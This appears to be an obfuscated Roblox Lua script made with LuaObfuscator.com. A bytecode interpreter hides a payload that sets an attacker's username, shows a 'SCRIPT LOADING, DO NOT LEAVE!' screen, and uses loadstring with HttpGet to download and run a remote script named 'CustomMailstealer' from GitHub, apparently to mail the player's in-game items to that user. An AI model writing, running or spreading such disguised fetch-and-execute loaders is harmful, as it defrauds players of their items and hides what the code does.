--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.19) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==5) then v27=v24;v28=nil;function v28(...)return {...},v12("#",...);end v18=6;end if (v18==1) then v21=nil;function v21(v31,v32,v33)if v33 then local v70=0 -0 ;local v71;while true do if (v70==((1065 -(68 + 997)) -0)) then v71=(v31/((3 -1)^(v32-(2 -1))))%((621 -(555 + (1334 -(226 + 1044))))^(((v33-(932 -(857 + 74))) -(v32-(569 -(367 + 201)))) + (928 -(214 + 713)))) ;return v71-(v71%(1 + 0)) ;end end else local v72=0 + 0 ;local v73;while true do if (v72==(877 -(282 + 595))) then v73=(1639 -(1523 + 114))^(v32-((4 -3) + 0)) ;return (((v31%(v73 + v73))>=v73) and ((118 -(32 + 85)) -0)) or (0 + 0) ;end end end end v22=nil;v18=2;end if (v18==3) then v24=nil;function v24()local v34=0 + 0 ;local v35;local v36;local v37;local v38;while true do if (v34==(181 -(67 + 83 + 30))) then return (v38 * (16778173 -(892 + 65))) + (v37 * ((157334 -(915 + 82)) -90801)) + (v36 * (189 + 67)) + v35 ;end if (v34==(0 -0)) then v35,v36,v37,v38=v1(v16,v19,v19 + ((11 -7) -1) );v19=v19 + (10 -6) ;v34=1 -0 ;end end end v25=nil;v18=4;end if (v18==6) then v29=nil;function v29()local v39=0 -0 ;local v40;local v41;local v42;local v43;local v44;local v45;local v46;while true do if (v39~=(0 -0)) then else local v77=0 -0 ;while true do if ((0 + 0)==v77) then v40=0;v41=nil;v77=1 -0 ;end if (v77==(1 + 0)) then v39=1;break;end end end if (v39~=(1475 -(1329 + 145))) then else local v78=971 -(140 + 831) ;while true do if (1==v78) then v39=2;break;end if (v78==0) then v42=nil;v43=nil;v78=1;end end end if (v39~=(1853 -(1409 + 441))) then else v46=nil;while true do if (v40~=(720 -(15 + 703))) then else local v103=0 + 0 ;while true do if (v103~=1) then else for v114=1,v24() do local v115=0;local v116;local v117;local v118;local v119;while true do if (v115==(438 -(262 + 176))) then v116=1721 -(345 + 1376) ;v117=nil;v115=1;end if (v115~=1) then else v118=nil;v119=nil;v115=690 -(198 + 490) ;end if (v115~=2) then else while true do if (v116~=1) then else v119=nil;while true do if (v117~=1) then else while true do if (v118==(0 -0)) then v119=v22();if (v21(v119,2 -1 ,1207 -(696 + 510) )==0) then local v182=0;local v183;local v184;local v185;local v186;while true do if (v182~=(3 -1)) then else while true do if ((1263 -(1091 + 171))~=v183) then else local v187=0 + 0 ;while true do if (v187==1) then v183=2;break;end if (v187~=0) then else v186={v23(),v23(),nil,nil};if (v184==(374 -(123 + 251))) then local v192=0;local v193;local v194;while true do if (v192==(4 -3)) then while true do if (v193~=0) then else v194=698 -(208 + 490) ;while true do if (v194==(0 + 0)) then v186[2 + 1 ]=v23();v186[840 -(660 + 176) ]=v23();break;end end break;end end break;end if (v192~=0) then else v193=0 + 0 ;v194=nil;v192=203 -(14 + 188) ;end end elseif (v184==1) then v186[678 -(534 + 141) ]=v24();elseif (v184==(1 + 1)) then v186[3 + 0 ]=v24() -(2^(16 + 0)) ;elseif (v184==(6 -3)) then local v201=0;local v202;while true do if (v201~=(0 -0)) then else v202=0;while true do if (v202==(0 -0)) then v186[3]=v24() -((2 + 0)^(11 + 5)) ;v186[400 -(115 + 281) ]=v23();break;end end break;end end end v187=2 -1 ;end end end if (v183==(3 + 0)) then if (v21(v185,7 -4 ,3)==(3 -2)) then v186[871 -(550 + 317) ]=v46[v186[4]];end v41[v114]=v186;break;end if (v183~=(0 -0)) then else v184=v21(v119,2,3);v185=v21(v119,4,8 -2 );v183=2 -1 ;end if ((287 -(134 + 151))==v183) then local v189=1665 -(970 + 695) ;while true do if (v189~=0) then else if (v21(v185,1 -0 ,1)==(1991 -(582 + 1408))) then v186[2]=v46[v186[2]];end if (v21(v185,6 -4 ,2)==(1 -0)) then v186[3]=v46[v186[3]];end v189=1;end if (v189==(3 -2)) then v183=3;break;end end end end break;end if (v182==1) then v185=nil;v186=nil;v182=2;end if (v182==0) then v183=0;v184=nil;v182=1;end end end break;end end break;end if (v117~=0) then else local v180=0;while true do if (v180~=0) then else local v181=1824 -(1195 + 629) ;while true do if (0~=v181) then else v118=0;v119=nil;v181=1 -0 ;end if (v181~=(242 -(187 + 54))) then else v180=781 -(162 + 618) ;break;end end end if (1==v180) then v117=1 + 0 ;break;end end end end break;end if (v116==0) then v117=0 + 0 ;v118=nil;v116=1;end end break;end end end v40=3;break;end if (v103==(0 -0)) then for v120=1,v45 do local v121=0 -0 ;local v122;local v123;while true do if (v121~=0) then else local v124=0 + 0 ;local v125;while true do if (0~=v124) then else v125=1636 -(1373 + 263) ;while true do if (v125~=(1000 -(451 + 549))) then else v122=v22();v123=nil;v125=1;end if (v125==1) then v121=1;break;end end break;end end end if (v121==(1 + 0)) then if (v122==(1 -0)) then v123=v22()~=0 ;elseif (v122==(2 -0)) then v123=v25();elseif (v122~=(1387 -(746 + 638))) then else v123=v26();end v46[v120]=v123;break;end end end v44[3]=v22();v103=1;end end end if (v40~=(0 + 0)) then else local v104=0 -0 ;local v105;while true do if (v104==0) then v105=341 -(218 + 123) ;while true do if (v105==0) then v41={};v42={};v105=1582 -(1535 + 46) ;end if (v105==1) then v43={};v40=1 + 0 ;break;end end break;end end end if (1~=v40) then else v44={v41,v42,nil,v43};v45=v24();v46={};v40=2;end if (v40==3) then local v106=0;local v107;while true do if (v106==0) then v107=0 + 0 ;while true do if (v107~=(0 -0)) then else for v127=1,v24() do v42[v127-1 ]=v29();end return v44;end end break;end end end end break;end if (v39==(1469 -(899 + 568))) then local v79=0 + 0 ;while true do if (v79~=(0 -0)) then else v44=nil;v45=nil;v79=1;end if (v79==1) then v39=3;break;end end end end end v30=nil;v18=7;end if (v18==4) then function v25()local v47=529 -(406 + 123) ;local v48;local v49;local v50;local v51;local v52;local v53;while true do if (v47==(604 -(268 + 335))) then v50=291 -(60 + 230) ;v51=(v21(v49,573 -(426 + 146) ,3 + 17 ) * ((1458 -(282 + 1174))^((2612 -(1749 + 20)) -(569 + 242)))) + v48 ;v47=5 -3 ;end if (v47==(1 + 1)) then v52=v21(v49,1045 -(168 + 538 + 318) ,1282 -(721 + 530) );v53=((v21(v49,32)==(1272 -(945 + (1648 -(1249 + 73))))) and  -1) or (2 -1) ;v47=3;end if (v47==(2 + 1 + (1145 -(466 + 679)))) then if (v52==(700 -(271 + 429))) then if (v51==(0 + 0)) then return v53 * (1500 -(1408 + 92)) ;else v52=1087 -(461 + 625) ;v50=1288 -(993 + 295) ;end elseif (v52==2047) then return ((v51==(0 + 0)) and (v53 * ((1172 -(418 + 753))/0))) or (v53 * NaN) ;end return v8(v53,v52-((938 -548) + 633) ) * (v50 + (v51/((1 + 1)^(16 + (102 -66))))) ;end if (v47==(0 + 0)) then v48=v24();v49=v24();v47=1;end end end v26=nil;function v26(v54)local v55=1900 -(106 + 1794) ;local v56;local v57;while true do if (v55==(1 + 1)) then v57={};for v83=1 + 0 , #v56 do v57[v83]=v2(v1(v3(v56,v83,v83)));end v55=8 -5 ;end if (v55==(7 -4)) then return v6(v57);end if (v55==0) then v56=nil;if  not v54 then local v99=114 -(4 + (245 -135)) ;while true do if (v99==0) then v54=v24();if (v54==(584 -(57 + 527))) then return "";end break;end end end v55=(4135 -2707) -(41 + 1386) ;end if (v55==(104 -(17 + 86))) then v56=v3(v16,v19,(v19 + v54) -1 );v19=v19 + v54 ;v55=2 + 0 ;end end end v18=5;end if (v18==2) then function v22()local v58=166 -((246 -124) + 44) ;local v59;while true do if (v58==(1 -0)) then return v59;end if (v58==(0 -0)) then v59=v1(v16,v19,v19);v19=v19 + 1 + 0 ;v58=1 + 0 ;end end end v23=nil;function v23()local v60,v61=v1(v16,v19,v19 + (67 -(30 + 35)) );v19=v19 + 2 ;return (v61 * (176 + 80)) + v60 ;end v18=3;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v62)if (v1(v62,2)==79) then local v74=0;while true do if (v74==0) then v20=v0(v3(v62,1,1));return "";end end else local v75=0;local v76;while true do if (v75==0) then v76=v2(v0(v62,16));if v20 then local v108=v5(v76,v20);v20=nil;return v108;else return v76;end break;end end end end);v18=1;end if (v18==7) then function v30(v63,v64,v65)local v66=0;local v67;local v68;local v69;while true do if (v66==1) then v69=v63[3];return function(...)local v85=v67;local v86=v68;local v87=v69;local v88=v28;local v89=1;local v90= -1;local v91={};local v92={...};local v93=v12("#",...) -1 ;local v94={};local v95={};for v100=0,v93 do if (v100>=v87) then v91[v100-v87 ]=v92[v100 + 1 ];else v95[v100]=v92[v100 + 1 ];end end local v96=(v93-v87) + 1 ;local v97;local v98;while true do v97=v85[v89];v98=v97[1];if (v98<=7) then if (v98<=3) then if (v98<=1) then if (v98==0) then local v129=0;local v130;local v131;local v132;local v133;while true do if (0==v129) then v130=v97[2];v131,v132=v88(v95[v130](v13(v95,v130 + 1 ,v97[3])));v129=1;end if (v129==1) then v90=(v132 + v130) -1 ;v133=0;v129=2;end if (v129==2) then for v174=v130,v90 do v133=v133 + 1 ;v95[v174]=v131[v133];end break;end end else v65[v97[3]]=v95[v97[2]];end elseif (v98>2) then local v136=0;local v137;while true do if (v136==0) then v137=v97[2];v95[v137]=v95[v137](v13(v95,v137 + 1 ,v90));break;end end else v95[v97[2]]=v97[3];end elseif (v98<=5) then if (v98>4) then v95[v97[2]]();elseif ((v97[3]=="_ENV") or (v97[3]=="getfenv")) then v95[v97[2]]=v65;else v95[v97[2]]=v65[v97[3]];end elseif (v98==6) then do return;end else v95[v97[2]]=v97[3];end elseif (v98<=11) then if (v98<=9) then if (v98==8) then local v142=0;local v143;local v144;while true do if (0==v142) then v143=v97[2];v144=v95[v97[3]];v142=1;end if (v142==1) then v95[v143 + 1 ]=v144;v95[v143]=v144[v97[4]];break;end end elseif ((v97[3]=="_ENV") or (v97[3]=="getfenv")) then v95[v97[2]]=v65;else v95[v97[2]]=v65[v97[3]];end elseif (v98==10) then local v145=0;local v146;local v147;local v148;local v149;while true do if (v145==0) then v146=v97[2];v147,v148=v88(v95[v146](v13(v95,v146 + 1 ,v97[3])));v145=1;end if (v145==2) then for v177=v146,v90 do v149=v149 + 1 ;v95[v177]=v147[v149];end break;end if (1==v145) then v90=(v148 + v146) -1 ;v149=0;v145=2;end end else v95[v97[2]]();end elseif (v98<=13) then if (v98>12) then local v150=v97[2];local v151=v95[v97[3]];v95[v150 + 1 ]=v151;v95[v150]=v151[v97[4]];else v65[v97[3]]=v95[v97[2]];end elseif (v98==14) then do return;end else local v157=v97[2];v95[v157]=v95[v157](v13(v95,v157 + 1 ,v90));end v89=v89 + 1 ;end end;end if (v66==0) then v67=v63[1];v68=v63[2];v66=1;end end end return v30(v29(),{},v17)(...);end end end v15("LOL!0A3O0003083O00557365726E616D65030D3O006D6F68616D6564746168616568030F3O00475F4C6F6164696E675363722O656E031D3O00534352495054204C4F4144494E472C20444F204E4F54204C4541564521030D3O00475F4D61696C6D652O7361676503053O002O6720657A030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574034B3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F4D6F7269437573746F6D2F6D61696E2F437573746F6D4D61696C737465616C6572000E3O0012073O00023O00120C3O00013O0012073O00043O00120C3O00033O0012073O00063O00120C3O00053O0012093O00073O001209000100083O0020080001000100090012070003000A4O000A000100034O00035O00022O00053O000100012O00063O00017O00",v9(),...);
